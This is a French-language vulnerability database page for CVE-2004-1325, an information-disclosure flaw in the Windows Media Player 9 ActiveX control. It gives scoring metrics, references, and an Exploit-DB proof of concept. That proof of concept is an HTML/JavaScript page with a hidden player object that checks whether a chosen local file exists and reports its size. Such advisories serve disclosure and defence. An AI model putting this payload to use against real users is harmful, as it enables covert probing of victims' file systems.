CVE-2004-1325 : Détail

CVE-2004-1325

15.08%V3
Network
2005-01-06
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The getItemInfoByAtom function in the ActiveX control for Microsoft Windows Media Player 9.0 returns a 0 if the file does not exist and the size of the file if the file exists, which allows remote attackers to determine the existence of files on the local system.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 25032

Date de publication : 2004-12-17 23h00 +00:00
Auteur : Arman Nayyeri
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/12032/info The Windows Media Player ActiveX control is prone to a security weakness that may allow a malicious Web page to enumerate files that exist on the client computer. This could aid in further attacks. This issue is reported to affect Windows Media Player 9. It reportedly does not work on computers running Windows XP SP2 when the attack is executed from a remote source. This is likely due to additional browser security measures in Windows XP SP2. <html><head><title>My Mortality</title></head><body> <H1>Look at yourself and find the mortality of your body</H1> <object style="display:none;" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" id="WindowsMediaPlayer"> <param name="autoStart" value="0"> <param name="mute" value="1"> </object> <script> var filePath = prompt("Enter the path of local file to check:","c:\\test.txt"); WindowsMediaPlayer.URL=filePath; setTimeout( function(){ ss=WindowsMediaPlayer.currentMedia.getItemInfoByAtom(19); if (ss!="") alert(filePath+" exist.\nThe file size is "+ss+" bytes. And you are surely vulnerable"); else alert(filePath+" does not exist. Or you are not vulnerable"); } ,100); </script> </body></html>

Products Mentioned

Configuraton 0

Microsoft>>Windows_media_player >> Version 9

Références

http://marc.info/?l=bugtraq&m=110352518211306&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/12032
Tags : vdb-entry, x_refsource_BID